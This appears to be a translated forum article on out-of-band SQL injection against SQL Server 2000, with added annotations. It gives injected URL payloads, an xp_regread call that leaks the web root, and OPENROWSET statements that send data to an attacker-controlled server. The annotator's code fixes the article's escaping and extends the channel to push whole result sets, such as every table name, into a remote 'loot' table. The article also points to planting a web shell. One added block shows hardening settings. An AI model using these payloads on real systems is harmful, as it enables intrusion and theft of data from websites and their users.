Source: Firefox Technology Alliance
In the previous phase, while attacking a website, we found that the target suppressed every error message, that the application connected to the database as an ordinary (non-sa) account, and that the server had every patch installed, which makes injection awkward.. So I put together a kind of "cross-site SQL injection" of my own.. (in today's terms this is an out-of-band injection: the data leaves the server over a second connection instead of inside the HTTP response).
The idea is this. If the target will not display the error, can I get it displayed somewhere else? Make SQL Server write what I want to see to another place...
Since this is the research phase, better not inject the live site straight away; first work the method out in Query Analyzer..
First thought:
SQL Server can connect to external databases..
So, in Query Analyzer, log on to the database of one of my own virtual hosts (the account there has fairly few permissions, a good stand-in for the target), start a SQL Server locally, and as sa create a trace in SQL Profiler.
If sp_addlinkedserver succeeds, the remote server can be worked with just like a local database..
But sp_addlinkedserver requires the sysadmin role.. Failed..
Another idea:
As long as the SQL command is sent, it does not matter what the execution result is; the receiving side only has to see the command text..
So, a command with a low permission requirement: OPENROWSET, for ad hoc cross-server queries.. It sends a query to a remote database and returns the result set.. So start a trace in Profiler on my own server to watch the statements that arrive.. (This relies on the fact that SQL Server 2000 lets any login run OPENROWSET against a remote server by default. SQL Server 2005 and later ship with the 'Ad Hoc Distributed Queries' option disabled, and on SQL Server 2000 the DisallowAdhocAccess registry value under the provider's key turns it off; a target with either in place does not connect out.)
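The setting that closes this channel on the target side, as an added check that is not part of the article. It assumes SQL Server 2005 or later for sp_configure and that the web application's login is the one to be checked; the REVOKE only matters where public was granted EXECUTE on xp_regread.

```sql
-- Added hardening check, not part of the article. Run as sysadmin on the server that
-- hosts the web application's database (SQL Server 2005 or later for the option below).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Weak state: run_value = 1 lets any login that can run a query hand OPENROWSET or
-- OPENDATASOURCE a connection string and push data to a server of its choosing.
EXEC sp_configure 'Ad Hoc Distributed Queries';

-- Corrected state: 0 (the default on 2005 and later). OPENROWSET against a remote
-- server then fails with error 15281 instead of connecting out.
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;

-- The path-disclosure half relied on the application login being able to call
-- xp_regread. Run the SELECT as that login to see whether it can, and take it away.
USE master;
SELECT HAS_PERMS_BY_NAME('dbo.xp_regread', 'OBJECT', 'EXECUTE') AS can_read_registry;
REVOKE EXECUTE ON dbo.xp_regread FROM public;
```

Disabling the option breaks any legitimate ad hoc distributed query too, so check for application code that uses OPENROWSET before flipping it; linked servers created with sp_addlinkedserver are unaffected.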
First, execute create table [dbo].[laokai] ([cha8] [char](255)) to create a table. Next, write the web root path into it. OPENROWSET only accepts string literals, not variables, so the statement that carries the path has to be composed as text and executed dynamically; here I go one step further and store the finished cross-server statement in the table, so it can simply be fetched and executed..
DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into laokai(cha8) values('SELECT a.* from openrowset(''SQLOLEDB'',''your IP'';''sa'';''password'',''SELECT * FROM pubs.dbo.authors where au_fname = '''''+@result+''''''') AS a');--
What does this code do? It reads the website path out of the registry and writes it into the database.. But it is not a plain write: while writing, it builds a complete SQL statement around the value. The result of executing it is that one row like the following is added to the cha8 field of table laokai:
SELECT a.* from openrowset('SQLOLEDB','your IP';'sa';'password','SELECT * FROM pubs.dbo.authors where au_fname = ''C:\Inetpub,1''') AS a
C:\Inetpub is the web root recorded under that registry value, and the trailing 1 is the access flag stored with it. The last thing to do is:
DECLARE @a1 char(255) set @a1 = (SELECT cha8 FROM laokai) exec(@a1);--
This is equivalent to executing
SELECT a.* from openrowset('SQLOLEDB','your IP';'sa';'password','SELECT * FROM pubs.dbo.authors where au_fname = ''C:\Inetpub,1''') AS a
on the target... At the same time, the Profiler trace on your side shows
SELECT * FROM pubs.dbo.authors where au_fname = 'C:\Inetpub,1'
where C:\Inetpub is the website path.. Debugging successful..
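The whole two-stage chain written out with the quoting made explicit, as an added example rather than the article's own code. It assumes a receiving SQL Server at 10.0.0.1 with login sa and password password, the pubs sample database present there, and a Profiler trace on it that includes the SQL:BatchStarting event (the carrier query does not have to succeed; the trace records the text when the batch arrives). The victim side is what a low-privilege login runs, whether typed into Query Analyzer or injected; the address, credentials and table width are assumptions.

```sql
-- Added example, not the article's code. Assumes: receiving server 10.0.0.1, login
-- sa/password, pubs.dbo.authors present there, a Profiler trace running on it, and a
-- victim on SQL Server 2000 where the application login may call xp_regread and OPENROWSET.
--
-- Three levels of quoting are involved:
--   level 0, what the trace shows:   SELECT * FROM pubs.dbo.authors WHERE au_fname = 'C:\Inetpub,1'
--   level 1, what the victim runs:   the level-0 text inside OPENROWSET's query literal, quotes doubled
--   level 2, the stored text:        the level-1 statement as a literal in the INSERT, quotes doubled again

-- Stage one: a table for the carrier statement (wider than the article's char(255)
-- so a long path cannot truncate the statement).
CREATE TABLE dbo.laokai (cha8 varchar(4000));

DECLARE @result varchar(255);
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
    'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result OUTPUT;

-- Build the level-1 statement. The value goes inside the OPENROWSET query literal, so
-- any single quote it contains must be doubled (REPLACE does the level-1 escaping).
DECLARE @carrier varchar(4000);
SET @carrier = 'SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''10.0.0.1'';''sa'';''password'','
             + '''SELECT * FROM pubs.dbo.authors WHERE au_fname = '''''
             + REPLACE(@result, '''', '''''')
             + ''''''') AS a';
INSERT INTO dbo.laokai (cha8) VALUES (@carrier);

-- Stage two: fetch the stored statement and run it. OPENROWSET takes only literals, so the
-- composed text has to go through EXEC; this is the step that makes the victim connect out.
DECLARE @a1 varchar(4000);
SET @a1 = (SELECT TOP 1 cha8 FROM dbo.laokai);
EXEC (@a1);
```

The table is only a convenience for splitting the work across two short injections; with a single statement of sufficient length the same thing is EXEC (@carrier) directly. The REPLACE is what the article's version lacks: a path containing a quote would otherwise break the carrier and the victim would report nothing.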
Now for practice.. A website suppresses all error messages.. But it has an injection point, a.asp?id=1. How do we approach it?
a.asp?id=1;create table [dbo].[laokai]([cha8] [char](255))--
The page comes back normally. We have created a table named laokai with a field named cha8. Then:
a.asp?id=1;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into laokai(cha8) values('SELECT a.* from openrowset(''SQLOLEDB'',''your IP'';''sa'';''password'',''SELECT * FROM pubs.dbo.authors where au_fname = '''''+@result+''''''') AS a');--
Error.. and the error text is suppressed.. What now? After some research it turns out that certain characters, such as the plus sign, have to be sent URL-encoded as %XX, because the web server decodes a bare + in the query string as a space and the string concatenation falls apart.. Perhaps other characters need converting too.. What to do?
So I wrote an ASCII-to-hex conversion tool, encoded the whole statement and injected it.. (Tool: http://www.cha8.com/ascii.rar; please put it on the CD rather than downloading it, my server cannot take the load.) The last step is naturally to run the statement above..
a.asp?id=1;%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%65%78%65%63%20 (and so on: the rest of the statement above, every character percent-encoded in the same way)
Executed successfully...
a.asp?id=1;DECLARE @a1 char(255) set @a1 = (SELECT cha8 FROM laokai) exec(@a1);--
The site still shows its normal page.. but the Profiler trace on your side shows:
SELECT * FROM pubs.dbo.authors where au_fname = 'C:\Inetpub,1'
Injection successful.. There are plenty of articles on planting a web shell (trojan) once you know the absolute path, so I will not repeat that here..
Finally, another way to get data out of the database..
Instead of using the value as a condition, as in SELECT * FROM pubs.dbo.authors where au_fname = '+@result+', rewrite the remote query as an insert so the data is written into a table on the receiving server.. It is also fine to send @result on its own rather than embedding it, but that raises errors: what is left to execute on the far side is exec 'C:\Inetpub,1'.
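The insert variant from the last paragraph, as an added example that is not the article's code, generalised so that any result set can be pushed out row by row. It assumes the same receiving server 10.0.0.1 with login sa/password and a database loot with a table dbo.inbox created there beforehand; server, credentials and table are assumptions. Nothing has to be watched in Profiler: the rows simply appear in the table.

```sql
-- Added example, not the article's code. Assumes: receiving server 10.0.0.1, login
-- sa/password, and that this was run there once:
--   CREATE DATABASE loot;
--   CREATE TABLE loot.dbo.inbox (payload varchar(8000), received datetime DEFAULT GETDATE());
-- The victim must be able to reach 10.0.0.1 on TCP/1433 and be allowed to use OPENROWSET.

-- Victim side: the registry value goes out as a row, so it never sits inside a WHERE clause,
-- nothing on the receiving side (such as pubs.dbo.authors) has to exist for the query to parse,
-- and the only escaping needed is for the VALUES literal.
DECLARE @result varchar(255);
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
    'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result OUTPUT;

DECLARE @sql varchar(4000);
SET @sql = 'INSERT INTO OPENROWSET(''SQLOLEDB'',''10.0.0.1'';''sa'';''password'','
         + '''SELECT payload FROM loot.dbo.inbox'') (payload) VALUES ('''
         + REPLACE(@result, '''', '''''') + ''')';
EXEC (@sql);

-- The same carrier takes a whole result set: INSERT ... SELECT into the remote rowset.
-- Here it ships every table name in the current database, one row each.
SET @sql = 'INSERT INTO OPENROWSET(''SQLOLEDB'',''10.0.0.1'';''sa'';''password'','
         + '''SELECT payload FROM loot.dbo.inbox'') (payload) '
         + 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES';
EXEC (@sql);
```

The INSERT ... SELECT form is the one to prefer when more than a single value is wanted: a SELECT that returns many rows would have to be looped through to fit them into WHERE clauses one at a time, whereas the insert pushes the whole set in one connection.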